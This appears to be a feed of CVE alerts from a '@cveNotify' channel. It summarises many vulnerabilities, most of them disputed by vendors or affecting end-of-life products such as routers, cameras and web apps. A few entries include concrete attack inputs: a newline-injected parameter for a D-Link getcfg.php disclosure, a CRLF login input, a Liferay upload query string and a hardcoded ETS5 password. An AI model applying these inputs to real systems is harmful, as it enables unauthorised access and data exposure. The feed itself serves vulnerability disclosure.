🚨 CVE-2020-11968In the web-panel in IQrouter through 3.3.1, remote attackers can read system logs because of Incorrect Access Control. Note: The vendor claims that this vulnerability can only occur on a brand-new network that, after initiating the forced initial configuration (which has a required step for setting a secure password on the system), makes this CVE invalid. This vulnerability is “true for any unconfigured release of OpenWRT, and true of many other new Linux distros prior to being configured for the first time”🎖@cveNotify |
|
| 2024-08-04 12:37:35 |
🚨 CVE-2020-11965In IQrouter through 3.3.1, there is a root user without a password, which allows attackers to gain full remote access via SSH. Note: The vendor claims that this vulnerability can only occur on a brand-new network that, after initiating the forced initial configuration (which has a required step for setting a secure password on the system), makes this CVE invalid. This vulnerability is “true for any unconfigured release of OpenWRT, and true of many other new Linux distros prior to being configured for the first time”🎖@cveNotify |
|
| 2024-08-04 12:37:31 |
🚨 CVE-2020-11963IQrouter through 3.3.1, when unconfigured, has multiple remote code execution vulnerabilities in the web-panel because of Bash Shell Metacharacter Injection. Note: The vendor claims that this vulnerability can only occur on a brand-new network that, after initiating the forced initial configuration (which has a required step for setting a secure password on the system), makes this CVE invalid. This vulnerability is “true for any unconfigured release of OpenWRT, and true of many other new Linux distros prior to being configured for the first time”🎖@cveNotify |
|
| 2024-08-04 12:37:30 |
🚨 CVE-2020-11876airhost.exe in Zoom Client for Meetings 4.6.11 uses the SHA-256 hash of 0123425234234fsdfsdr3242 for initialization of an OpenSSL EVP AES-256 CBC context. NOTE: the vendor states that this initialization only occurs within unreachable code🎖@cveNotify |
|
| 2024-08-04 12:37:29 |
🚨 CVE-2020-11725snd_ctl_elem_add in sound/core/control.c in the Linux kernel through 5.6.3 has a count=info->owner line, which later affects a private_size*count multiplication for unspecified "interesting side effects." NOTE: kernel engineers dispute this finding, because it could be relevant only if new callers were added that were unfamiliar with the misuse of the info->owner field to represent data unrelated to the "owner" concept. The existing callers, SNDRV_CTL_IOCTL_ELEM_ADD and SNDRV_CTL_IOCTL_ELEM_REPLACE, have been designed to misuse the info->owner field in a safe way🎖@cveNotify |
|
| 2024-08-04 12:37:26 |
🚨 CVE-2020-11710An issue was discovered in docker-kong (for Kong) through 2.0.3. The admin API port may be accessible on interfaces other than 127.0.0.1. NOTE: The vendor argue that this CVE is not a vulnerability because it has an inaccurate bug scope and patch links. “1) Inaccurate Bug Scope - The issue scope was on Kong's docker-compose template, and not Kong's docker image itself. In reality, this issue is not associated with any version of the Kong gateway. As such, the description stating ‘An issue was discovered in docker-kong (for Kong) through 2.0.3.’ is incorrect. This issue only occurs if a user decided to spin up Kong via docker-compose without following the security documentation. The docker-compose template is meant for users to quickly get started with Kong, and is meant for development purposes only. 2) Incorrect Patch Links - The CVE currently points to a documentation improvement as a “Patch” link: https://github.com/Kong/docs.konghq.com/commit/d693827c32144943a2f45abc017c1321b33ff611.This link actually points to an improvement Kong Inc made for fool-proofing. However, instructions for how to protect the admin API were already well-documented here: https://docs.konghq.com/2.0.x/secure-admin-api/#network-layer-access-restrictions , which was first published back in 2017 (as shown in this commit: https://github.com/Kong/docs.konghq.com/commit/e99cf875d875dd84fdb751079ac37882c9972949) Lastly, the hyperlink to https://github.com/Kong/kong (an unrelated Github Repo to this issue) on the Hyperlink list does not include any meaningful information on this topic.🎖@cveNotify |
|
| 2024-08-04 12:37:25 |
🚨 CVE-2020-11441phpMyAdmin 5.0.2 allows CRLF injection, as demonstrated by %0D%0Astring%0D%0A inputs to login form fields causing CRLF sequences to be reflected on an error page. NOTE: the vendor states "I don't see anything specifically exploitable.🎖@cveNotify |
|
| 2024-08-04 12:37:24 |
🚨 CVE-2020-10871In OpenWrt LuCI git-20.x, remote unauthenticated attackers can retrieve the list of installed packages and services. NOTE: the vendor disputes the significance of this report because, for instances reachable by an unauthenticated actor, the same information is available in other (more complex) ways, and there is no plan to restrict the information further🎖@cveNotify |
|
| 2024-08-04 11:37:37 |
🚨 CVE-2020-9376D-Link DIR-610 devices allow Information Disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-04 11:37:36 |
🚨 CVE-2020-9384An Insecure Direct Object Reference (IDOR) vulnerability in the Change Password feature of Subex ROC Partner Settlement 10.5 allows remote authenticated users to achieve account takeover via manipulation of POST parameters. NOTE: This vulnerability may only affect a testing version of the application🎖@cveNotify |
|
| 2024-08-04 11:37:31 |
🚨 CVE-2020-10112Citrix Gateway 11.1, 12.0, and 12.1 allows Cache Poisoning. NOTE: Citrix disputes this as not a vulnerability. By default, Citrix ADC only caches static content served under certain URL paths for Citrix Gateway usage. No dynamic content is served under these paths, which implies that those cached pages would not change based on parameter values. All other data traffic going through Citrix Gateway are NOT cached by default🎖@cveNotify |
|
| 2024-08-04 11:37:30 |
🚨 CVE-2020-9353An issue was discovered in SmartClient 12.0. The Remote Procedure Call (RPC) loadFile provided by the console functionality on the /tools/developerConsoleOperations.jsp (or /isomorphic/IDACall) URL is affected by unauthenticated Local File Inclusion via directory-traversal sequences in the elem XML element in the _transaction parameter. NOTE: the documentation states "These tools are, by default, available to anyone ... so they should only be deployed into a trusted environment. Alternately, the tools can easily be restricted to administrators or end users by protecting the tools path with normal authentication and authorization mechanisms on the web server."🎖@cveNotify |
|
| 2024-08-04 11:37:26 |
🚨 CVE-2020-9351An issue was discovered in SmartClient 12.0. If an unauthenticated attacker makes a POST request to /tools/developerConsoleOperations.jsp or /isomorphic/IDACall with malformed XML data in the _transaction parameter, the server replies with a verbose error showing where the application resides (the absolute path). NOTE: the documentation states "These tools are, by default, available to anyone ... so they should only be deployed into a trusted environment. Alternately, the tools can easily be restricted to administrators or end users by protecting the tools path with normal authentication and authorization mechanisms on the web server."🎖@cveNotify |
|
| 2024-08-04 11:37:25 |
🚨 CVE-2020-9015Arista DCS-7050QX-32S-R 4.20.9M, DCS-7050CX3-32S-R 4.20.11M, and DCS-7280SRAM-48C6-R 4.22.0.1F devices (and possibly other products) allow attackers to bypass intended TACACS+ shell restrictions via a | character. NOTE: the vendor reports that this is a configuration issue relating to an overly permissive regular expression in the TACACS+ server permitted commands🎖@cveNotify |
|
| 2024-08-04 11:37:24 |
🚨 CVE-2020-8991vg_lookup in daemons/lvmetad/lvmetad-core.c in LVM2 2.02 mismanages memory, leading to an lvmetad memory leak, as demonstrated by running pvs. NOTE: RedHat disputes CVE-2020-8991 as not being a vulnerability since there’s no apparent route to either privilege escalation or to denial of service through the bug🎖@cveNotify |
|
| 2024-08-04 10:37:26 |
🚨 CVE-2020-8500In Artica Pandora FMS 7.42, Web Admin users can execute arbitrary code by uploading a .php file via the Updater or Extension component. NOTE: The vendor reports that this is intended functionality🎖@cveNotify |
|
| 2024-08-04 10:37:25 |
🚨 CVE-2020-7240Meinberg Lantime M300 and M1000 devices allow attackers (with privileges to configure a device) to execute arbitrary OS commands by editing the /config/netconf.cmd script (aka Extended Network Configuration). Note: According to the description, the vulnerability requires a fully authenticated super-user account using a webUI function that allows super users to edit a script supposed to execute OS commands. The given weakness enumeration (CWE-78) is not applicable in this case as it refers to abusing functions/input fields not supposed to be accepting OS commands by using 'Special Elements.🎖@cveNotify |
|
| 2024-08-04 10:37:24 |
🚨 CVE-2020-7058data_input.php in Cacti 1.2.8 allows remote code execution via a crafted Input String to Data Collection -> Data Input Methods -> Unix -> Ping Host. NOTE: the vendor has stated "This is a false alarm.🎖@cveNotify |
|
| 2024-08-04 09:37:24 |
🚨 CVE-2024-7454A vulnerability, which was classified as critical, has been found in SourceCodester Clinics Patient Management System 1.0. Affected by this issue is the function patient_name of the file patients.php. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273548.🎖@cveNotify |
|
| 2024-08-04 06:37:24 |
🚨 CVE-2021-46703In the IsolatedRazorEngine component of Antaris RazorEngine through 4.5.1-alpha001, an attacker can execute arbitrary .NET code in a sandboxed environment (if users can externally control template contents). NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-04 05:37:38 |
🚨 CVE-2021-45364A Code Execution vulnerability exists in Statamic Version through 3.2.26 via SettingsController.php. NOTE: the vendor indicates that there was an error in publishing this CVE Record, and that all parties agree that the affected code was not used in any Statamic product🎖@cveNotify |
|
| 2024-08-04 05:37:31 |
🚨 CVE-2021-45956Dnsmasq 2.86 has a heap-based buffer overflow in print_mac (called from log_packet and dhcp_reply). NOTE: the vendor's position is that CVE-2021-45951 through CVE-2021-45957 "do not represent real vulnerabilities, to the best of our knowledge.🎖@cveNotify |
|
| 2024-08-04 05:37:30 |
🚨 CVE-2021-45954Dnsmasq 2.86 has a heap-based buffer overflow in extract_name (called from answer_auth and FuzzAuth). NOTE: the vendor's position is that CVE-2021-45951 through CVE-2021-45957 "do not represent real vulnerabilities, to the best of our knowledge.🎖@cveNotify |
|
| 2024-08-04 05:37:26 |
🚨 CVE-2021-45951Dnsmasq 2.86 has a heap-based buffer overflow in check_bad_address (called from check_for_bogus_wildcard and FuzzCheckForBogusWildcard). NOTE: the vendor's position is that CVE-2021-45951 through CVE-2021-45957 "do not represent real vulnerabilities, to the best of our knowledge.🎖@cveNotify |
|
| 2024-08-04 05:37:25 |
🚨 CVE-2021-44659Adding a new pipeline in GoCD server version 21.3.0 has a functionality that could be abused to do an un-intended action in order to achieve a Server Side Request Forgery (SSRF). NOTE: the vendor's position is that the observed behavior is not a vulnerability, because the product's design allows an admin to configure outbound requests🎖@cveNotify |
|
| 2024-08-04 05:37:24 |
🚨 CVE-2021-45099The addon.stdin service in addon-ssh (aka Home Assistant Community Add-on: SSH & Web Terminal) before 10.0.0 has an attack surface that requires social engineering. NOTE: the vendor does not agree that this is a vulnerability; however, addon.stdin was removed as a defense-in-depth measure against complex social engineering situations🎖@cveNotify |
|
| 2024-08-04 04:37:41 |
🚨 CVE-2021-43979Styra Open Policy Agent (OPA) Gatekeeper through 3.7.0 mishandles concurrency, sometimes resulting in incorrect access control. The data replication mechanism allows policies to access the Kubernetes cluster state. During data replication, OPA/Gatekeeper does not wait for the replication to finish before processing a request, which might cause inconsistencies between the replicated resources in OPA/Gatekeeper and the resources actually present in the cluster. Inconsistency can later be reflected in a policy bypass. NOTE: the vendor disagrees that this is a vulnerability, because Kubernetes states are only eventually consistent🎖@cveNotify |
|
| 2024-08-04 04:37:36 |
🚨 CVE-2021-43616The npm ci command in npm 7.x and 8.x through 8.1.3 proceeds with an installation even if dependency information in package-lock.json differs from package.json. This behavior is inconsistent with the documentation, and makes it easier for attackers to install malware that was supposed to have been blocked by an exact version match requirement in package-lock.json. NOTE: The npm team believes this is not a vulnerability. It would require someone to socially engineer package.json which has different dependencies than package-lock.json. That user would have to have file system or write access to change dependencies. The npm team states preventing malicious actors from socially engineering or gaining file system access is outside the scope of the npm CLI.🎖@cveNotify |
|
| 2024-08-04 04:37:35 |
🚨 CVE-2021-43396In iconvdata/iso-2022-jp-3.c in the GNU C Library (aka glibc) 2.34, remote attackers can force iconv() to emit a spurious '\0' character via crafted ISO-2022-JP-3 data that is accompanied by an internal state reset. This may affect data integrity in certain iconv() use cases. NOTE: the vendor states "the bug cannot be invoked through user input and requires iconv to be invoked with a NULL inbuf, which ought to require a separate application bug to do so unintentionally. Hence there's no security impact to the bug.🎖@cveNotify |
|
| 2024-08-04 04:37:31 |
🚨 CVE-2021-42574An issue was discovered in the Bidirectional Algorithm in the Unicode Specification through 14.0. It permits the visual reordering of characters via control sequences, which can be used to craft source code that renders different logic than the logical ordering of tokens ingested by compilers and interpreters. Adversaries can leverage this to encode source code for compilers accepting Unicode such that targeted vulnerabilities are introduced invisibly to human reviewers. NOTE: the Unicode Consortium offers the following alternative approach to presenting this concern. An issue is noted in the nature of international text that can affect applications that implement support for The Unicode Standard and the Unicode Bidirectional Algorithm (all versions). Due to text display behavior when text includes left-to-right and right-to-left characters, the visual order of tokens may be different from their logical order. Additionally, control characters needed to fully support the requirements of bidirectional text can further obfuscate the logical order of tokens. Unless mitigated, an adversary could craft source code such that the ordering of tokens perceived by human reviewers does not match what will be processed by a compiler/interpreter/etc. The Unicode Consortium has documented this class of vulnerability in its document, Unicode Technical Report #36, Unicode Security Considerations. The Unicode Consortium also provides guidance on mitigations for this class of issues in Unicode Technical Standard #39, Unicode Security Mechanisms, and in Unicode Standard Annex #31, Unicode Identifier and Pattern Syntax. Also, the BIDI specification allows applications to tailor the implementation in ways that can mitigate misleading visual reordering in program text; see HL4 in Unicode Standard Annex #9, Unicode Bidirectional Algorithm.🎖@cveNotify |
|
| 2024-08-04 04:37:30 |
🚨 CVE-2021-41553In ARCHIBUS Web Central 21.3.3.815 (a version from 2014), the Web Application in /archibus/login.axvw assign a session token that could be already in use by another user. It was therefore possible to access the application through a user whose credentials were not known, without any attempt by the testers to modify the application logic. It is also possible to set the value of the session token, client-side, simply by making an unauthenticated GET Request to the Home Page and adding an arbitrary value to the JSESSIONID field. The application, following the login, does not assign a new token, continuing to keep the inserted one, as the identifier of the entire session. This is fixed in all recent versions, such as version 26. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Version 21.3 was officially de-supported by the end of 2020🎖@cveNotify |
|
| 2024-08-04 04:37:29 |
🚨 CVE-2021-41555In ARCHIBUS Web Central 21.3.3.815 (a version from 2014), XSS occurs in /archibus/dwr/call/plaincall/workflow.runWorkflowRule.dwr because the data received as input from clients is re-included within the HTTP response returned by the application without adequate validation. In this way, if HTML code or client-side executable code (e.g., Javascript) is entered as input, the expected execution flow could be altered. This is fixed in all recent versions, such as version 26. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Version 21.3 was officially de-supported by the end of 2020🎖@cveNotify |
|
| 2024-08-04 04:37:26 |
🚨 CVE-2021-41554ARCHIBUS Web Central 21.3.3.815 (a version from 2014) does not properly validate requests for access to data and functionality in these affected endpoints: /archibus/schema/ab-edit-users.axvw, /archibus/schema/ab-data-dictionary-table.axvw, /archibus/schema/ab-schema-add-field.axvw, /archibus/schema/ab-core/views/process-navigator/ab-my-user-profile.axvw. By not verifying the permissions for access to resources, it allows a potential attacker to view pages that are not allowed. Specifically, it was found that any authenticated user can reach the administrative console for user management by directly requesting access to the page via URL. This allows a malicious user to modify all users' profiles, to elevate any privileges to administrative ones, or to create or delete any type of user. It is also possible to modify the emails of other users, through a misconfiguration of the username parameter, on the user profile page. This is fixed in all recent versions, such as version 26. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Version 21.3 was officially de-supported by the end of 2020🎖@cveNotify |
|
| 2024-08-04 04:37:25 |
🚨 CVE-2021-41504An Elevated Privileges issue exists in D-Link DCS-5000L v1.05 and DCS-932L v2.17 and older. The use of the digest-authentication for the devices command interface may allow further attack vectors that may compromise the cameras configuration and allow malicious users on the LAN to access the device. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-04 04:37:24 |
🚨 CVE-2021-41503DCS-5000L v1.05 and DCS-932L v2.17 and older are affecged by Incorrect Acess Control. The use of the basic authentication for the devices command interface allows attack vectors that may compromise the cameras configuration and allow malicious users on the LAN to access the device. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-04 03:37:31 |
🚨 CVE-2024-7449A vulnerability, which was classified as critical, was found in itsourcecode Placement Management System 1.0. Affected is an unknown function of the file login.php. The manipulation of the argument email leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273540.🎖@cveNotify |
|
| 2024-08-04 03:37:30 |
🚨 CVE-2021-41320A technical user has hardcoded credentials in Wallstreet Suite TRM 7.4.83 (64-bit edition) with higher privilege than the average authenticated user. NOTE: the vendor disputes this because the password is not hardcoded (it can be changed during installation or at any later time).🎖@cveNotify |
|
| 2024-08-04 03:37:26 |
🚨 CVE-2021-41380RealVNC Viewer 6.21.406 allows remote VNC servers to cause a denial of service (application crash) via crafted RFB protocol data. NOTE: It is asserted that this issue requires social engineering a user into connecting to a fake VNC Server. The VNC Viewer application they are using will then hang, until terminated, but no memory leak occurs - the resources are freed once the hung process is terminated and the resource usage is constant during the hang. Only the process that is connected to the fake Server is affected. This is an application bug, not a security issue🎖@cveNotify |
|
| 2024-08-04 03:37:25 |
🚨 CVE-2021-39615D-Link DSR-500N version 1.02 contains hard-coded credentials for undocumented user accounts in the '/etc/passwd' file.If an attacker succeeds in recovering the cleartext password of the identified hash value, he will be able to log in via SSH or Telnet and thus gain access to the underlying embedded Linux operating system on the device. Fixed in version 2.12/2. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-04 03:37:24 |
🚨 CVE-2021-39613D-Link DVG-3104MS version 1.0.2.0.3, 1.0.2.0.4, and 1.0.2.0.4E contains hard-coded credentials for undocumented user accounts in the '/etc/passwd' file. As weak passwords have been used, the plaintext passwords can be recovered from the hash values. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-04 02:37:36 |
🚨 CVE-2021-37378Cross Site Scripting (XSS) vulnerability in Teradek Cube and Cube Pro firmware version 7.3.x and earlier allows remote attackers to run arbitrary code via the Friendly Name field in System Information Settings. NOTE: Vedor states the product has reached End of Life and will not be receiving any firmware updates to address this issue.🎖@cveNotify |
|
| 2024-08-04 02:37:35 |
🚨 CVE-2021-37377Cross Site Scripting (XSS) vulnerability in Teradek Brik firmware version 7.2.x and earlier allows remote attackers to run arbitrary code via the Friendly Name field in System Information Settings. NOTE: Vedor states the product has reached End of Life and will not be receiving any firmware updates to address this issue.🎖@cveNotify |
|
| 2024-08-04 02:37:32 |
🚨 CVE-2021-37376Cross Site Scripting (XSS) vulnerability in Teradek Bond, Bond 2 and Bond Pro firmware version 7.3.x and earlier allows remote attackers to run arbitrary code via the Friendly Name field in System Information Settings. NOTE: Vedor states the product has reached End of Life and will not be receiving any firmware updates to address this issue.🎖@cveNotify |
|
| 2024-08-04 02:37:31 |
🚨 CVE-2021-37374Cross Site Scripting (XSS) vulnerability in Teradek Clip all firmware versions allows remote attackers to run arbitrary code via the Friendly Name field in System Information Settings. NOTE: Vedor states the product has reached End of Life and will not be receiving any firmware updates to address this issue.🎖@cveNotify |
|
| 2024-08-04 02:37:30 |
🚨 CVE-2021-37253M-Files Web before 20.10.9524.1 allows a denial of service via overlapping ranges (in HTTP requests with crafted Range or Request-Range headers). NOTE: this is disputed because the range behavior is the responsibility of the web server, not the responsibility of the individual web application🎖@cveNotify |
|
| 2024-08-04 02:37:26 |
🚨 CVE-2021-38614Polipo through 1.1.1, when NDEBUG is used, allows a heap-based buffer overflow during parsing of a Range header. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-04 02:37:25 |
🚨 CVE-2021-38157LeoStream Connection Broker 9.x before 9.0.34.3 allows Unauthenticated Reflected XSS via the /index.pl user parameter. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-04 02:37:24 |
🚨 CVE-2021-37600An integer overflow in util-linux through 2.37.1 can potentially cause a buffer overflow if an attacker were able to use system resources in a way that leads to a large number in the /proc/sysvipc/sem file. NOTE: this is unexploitable in GNU C Library environments, and possibly in all realistic environments.🎖@cveNotify |
|
| 2024-08-04 01:37:30 |
🚨 CVE-2021-36690A segmentation fault can occur in the sqlite3.exe command-line component of SQLite 3.36.0 via the idxGetTableInfo function when there is a crafted SQL query. NOTE: the vendor disputes the relevance of this report because a sqlite3.exe user already has full privileges (e.g., is intentionally allowed to execute commands). This report does NOT imply any problem in the SQLite library.🎖@cveNotify |
|
| 2024-08-04 01:37:29 |
🚨 CVE-2021-36741An improper input validation vulnerability in Trend Micro Apex One, Apex One as a Service, OfficeScan XG, and Worry-Free Business Security 10.0 SP1 allows a remote attached to upload arbitrary files on affected installations. Please note: an attacker must first obtain the ability to logon to the product�s management console in order to exploit this vulnerability.🎖@cveNotify |
|
| 2024-08-04 01:37:26 |
🚨 CVE-2021-36799KNX ETS5 through 5.7.6 uses the hard-coded password ETS5Password, with a salt value of Ivan Medvedev, allowing local users to read project information. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-04 01:37:25 |
🚨 CVE-2021-35958TensorFlow through 2.5.0 allows attackers to overwrite arbitrary files via a crafted archive when tf.keras.utils.get_file is used with extract=True. NOTE: the vendor's position is that tf.keras.utils.get_file is not intended for untrusted archives🎖@cveNotify |
|
| 2024-08-04 01:37:24 |
🚨 CVE-2021-35196Manuskript through 0.12.0 allows remote attackers to execute arbitrary code via a crafted settings.pickle file in a project file, because there is insecure deserialization via the pickle.load() function in settings.py. NOTE: the vendor's position is that the product is not intended for opening an untrusted project file🎖@cveNotify |
|
| 2024-08-04 00:37:36 |
🚨 CVE-2021-33990Liferay Portal 6.2.5 allows Command=FileUpload&Type=File&CurrentFolder=/ requests when frmfolders.html exists. NOTE: The vendor disputes this issue because the exploit reference link only shows frmfolders.html is accessible and does not demonstrate how an unauthorized user can upload a file.🎖@cveNotify |
|
| 2024-08-04 00:37:35 |
🚨 CVE-2021-33430A Buffer Overflow vulnerability exists in NumPy 1.9.x in the PyArray_NewFromDescr_int function of ctors.c when specifying arrays of large dimensions (over 32) from Python code, which could let a malicious user cause a Denial of Service. NOTE: The vendor does not agree this is a vulneraility; In (very limited) circumstances a user may be able provoke the buffer overflow, the user is most likely already privileged to at least provoke denial of service by exhausting memory. Triggering this further requires the use of uncommon API (complicated structured dtypes), which is very unlikely to be available to an unprivileged user🎖@cveNotify |
|
| 2024-08-04 00:37:31 |
🚨 CVE-2021-32571In OSS-RC systems of the release 18B and older during data migration procedures certain files containing usernames and passwords are left in the system undeleted but in folders accessible by top privileged accounts only. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Ericsson Network Manager is a new generation OSS system which OSS-RC customers shall upgrade to🎖@cveNotify |
|
| 2024-08-04 00:37:30 |
🚨 CVE-2021-34370Accela Civic Platform through 20.1 allows ssoAdapter/logoutAction.do successURL XSS. NOTE: the vendor states "there are configurable security flags and we are unable to reproduce them with the available information.🎖@cveNotify |
|
| 2024-08-04 00:37:29 |
🚨 CVE-2021-34369portlets/contact/ref/refContactDetail.do in Accela Civic Platform through 20.1 allows remote attackers to obtain sensitive information via a modified contactSeqNumber value. NOTE: the vendor states "the information that is being queried is authorized for an authenticated user of that application, so we consider this not applicable.🎖@cveNotify |
|
| 2024-08-04 00:37:26 |
🚨 CVE-2021-33558Boa 0.94.13 allows remote attackers to obtain sensitive information via a misconfiguration involving backup.html, preview.html, js/log.js, log.html, email.html, online-users.html, and config.js. NOTE: multiple third parties report that this is a site-specific issue because those files are not part of Boa.🎖@cveNotify |
|
| 2024-08-04 00:37:25 |
🚨 CVE-2021-32089An issue was discovered on Zebra (formerly Motorola Solutions) Fixed RFID Reader FX9500 devices. An unauthenticated attacker can upload arbitrary files to the filesystem that can then be accessed through the web interface. This can lead to information disclosure and code execution. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-04 00:37:24 |
🚨 CVE-2021-32573The express-cart package through 1.1.10 for Node.js allows Reflected XSS (for an admin) via a user input field for product options. NOTE: the vendor states that this "would rely on an admin hacking his/her own website.🎖@cveNotify |
|
| 2024-08-03 23:37:25 |
🚨 CVE-2021-30496The Telegram app 7.6.2 for iOS allows remote authenticated users to cause a denial of service (application crash) if the victim pastes an attacker-supplied message (e.g., in the Persian language) into a channel or group. The crash occurs in MtProtoKitFramework. NOTE: the vendor's perspective is that "this behavior can't be considered a vulnerability."🎖@cveNotify |
|
| 2024-08-03 23:37:24 |
🚨 CVE-2021-30141Module/Settings/UserExport.php in Friendica through 2021.01 allows settings/userexport to be used by anonymous users, as demonstrated by an attempted access to an array offset on a value of type null, and excessive memory consumption. NOTE: the vendor states "the feature still requires a valid authentication cookie even if the route is accessible to non-logged users.🎖@cveNotify |
|
| 2024-08-03 22:37:32 |
🚨 CVE-2021-28246CA eHealth Performance Manager through 6.3.2.12 is affected by Privilege Escalation via a Dynamically Linked Shared Object Library. A regular user must create a malicious library in the writable RPATH, to be dynamically linked when the emtgtctl2 executable is run. The code in the library will be executed as the ehealth user. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-03 22:37:26 |
🚨 CVE-2021-28956The unofficial vscode-sass-lint (aka Sass Lint) extension through 1.0.7 for Visual Studio Code allows attackers to execute arbitrary binaries if the user opens a crafted workspace. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-03 22:37:25 |
🚨 CVE-2021-27583In Directus 8.x through 8.8.1, an attacker can discover whether a user is present in the database through the password reset feature. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-03 22:37:24 |
🚨 CVE-2021-27549Genymotion Desktop through 3.2.0 leaks the host's clipboard data to the Android application by default. NOTE: the vendor's position is that this is intended behavior that can be changed through the Settings > Device screen🎖@cveNotify |
|
| 2024-08-03 21:37:32 |
🚨 CVE-2021-26593In Directus 8.x through 8.8.1, an attacker can see all users in the CMS using the API /users/{id}. For each call, they get in response a lot of information about the user (such as email address, first name, and last name) but also the secret for 2FA if one exists. This secret can be regenerated. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-03 21:37:25 |
🚨 CVE-2021-26917PyBitmessage through 0.6.3.2 allows attackers to write screen captures to Potentially Unwanted Directories via a crafted apinotifypath value. NOTE: the discoverer states "security mitigation may not be necessary as there is no evidence yet that these screen intercepts are actually transported away from the local host." NOTE: it is unclear whether there are any common use cases in which apinotifypath is controlled by an attacker🎖@cveNotify |
|
| 2024-08-03 21:37:24 |
🚨 CVE-2021-26276scripts/cli.js in the GoDaddy node-config-shield (aka Config Shield) package before 0.2.2 for Node.js calls eval when processing a set command. NOTE: the vendor reportedly states that this is not a vulnerability. The set command was not intended for use with untrusted data🎖@cveNotify |
|
| 2024-08-03 20:37:32 |
🚨 CVE-2021-25650A privilege escalation vulnerability was discovered in Avaya Aura Utility Services that may potentially allow a local user to execute specially crafted scripts as a privileged user. Affects all 7.x versions of Avaya Aura Utility Services🎖@cveNotify |
|
| 2024-08-03 20:37:26 |
🚨 CVE-2021-25649An information disclosure vulnerability was discovered in the directory and file management of Avaya Aura Utility Services. This vulnerability may potentially allow any local user to access system functionality and configuration information that should only be available to a privileged user. Affects all 7.x versions of Avaya Aura Utility Services🎖@cveNotify |
|
| 2024-08-03 20:37:25 |
🚨 CVE-2021-25679The AdTran Personal Phone Manager software is vulnerable to an authenticated stored cross-site scripting (XSS) issues. These issues impact at minimum versions 10.8.1 and below but potentially impact later versions as well since they have not previously been disclosed. Only version 10.8.1 was able to be confirmed during primary research. NOTE: The affected appliances NetVanta 7060 and NetVanta 7100 are considered End of Life and as such this issue will not be patched🎖@cveNotify |
|
| 2024-08-03 20:37:24 |
🚨 CVE-2021-25310The administration web interface on Belkin Linksys WRT160NL 1.0.04.002_US_20130619 devices allows remote authenticated attackers to execute system commands with root privileges via shell metacharacters in the ui_language POST parameter to the apply.cgi form endpoint. This occurs in do_upgrade_post in mini_httpd. NOTE: This vulnerability only affects products that are no longer supported by the maintaine🎖@cveNotify |
|
| 2024-08-03 19:37:37 |
🚨 CVE-2024-38888An issue in Horizon Business Services Inc. Caterease 16.0.1.1663 through 24.0.1.2405 and possibly later versions, allows a local attacker to perform a Password Brute Forcing attack due to improper restriction of excessive authentication attempts.🎖@cveNotify |
|
| 2024-08-03 19:37:31 |
🚨 CVE-2024-38885An issue in Horizon Business Services Inc. Caterease 16.0.1.1663 through 24.0.1.2405 and possibly later versions, allows a remote attacker to perform unauthorized access using known operating system credentials due to hardcoded SQL user credentials in the client application.🎖@cveNotify |
|
| 2024-08-03 19:37:30 |
🚨 CVE-2024-38881An issue in Horizon Business Services Inc. Caterease 16.0.1.1663 through 24.0.1.2405 and possibly later versions, allows a remote attacker to perform a Rainbow Table Password cracking attack due to the use of one-way hashes without salts when storing user passwords.🎖@cveNotify |
|
| 2024-08-03 19:37:29 |
🚨 CVE-2024-38890An issue in Horizon Business Services Inc. Caterease Software 16.0.1.1663 through 24.0.1.2405 and possibly later versions allows a local attacker to perform an Authentication Bypass by Capture-replay attack due to insufficient protection against capture-replay attacks.🎖@cveNotify |
|
| 2024-08-03 19:37:26 |
🚨 CVE-2023-51148An issue in TRENDnet Trendnet AC1200 Dual Band PoE Indoor Wireless Access Point TEW-821DAP v.3.00b06 allows an attacker to execute arbitrary code via the 'mycli' command-line interface component.🎖@cveNotify |
|
| 2024-08-03 19:37:25 |
🚨 CVE-2021-22766A CWE-20: Improper Input Validation vulnerability exists in PowerLogic EGX100 (Versions 3.0.0 and newer) and PowerLogic EGX300 (All Versions) that could cause denial of service via a specially crafted HTTP packet🎖@cveNotify |
|
| 2024-08-03 19:37:24 |
🚨 CVE-2021-22765A CWE-20: Improper Input Validation vulnerability exists in PowerLogic EGX100 (Versions 3.0.0 and newer) and PowerLogic EGX300 (All Versions) that could cause denial of service or remote code execution via a specially crafted HTTP packet🎖@cveNotify |
|
| 2024-08-03 18:37:31 |
🚨 CVE-2024-7442** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in Vivotek SD9364 VVTK-0103f. It has been rated as critical. This issue affects the function getenv of the file upload_file.cgi. The manipulation of the argument QUERY_STRING leads to command injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-273527. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the affected release tree is end-of-life.🎖@cveNotify |
|
| 2024-08-03 18:37:30 |
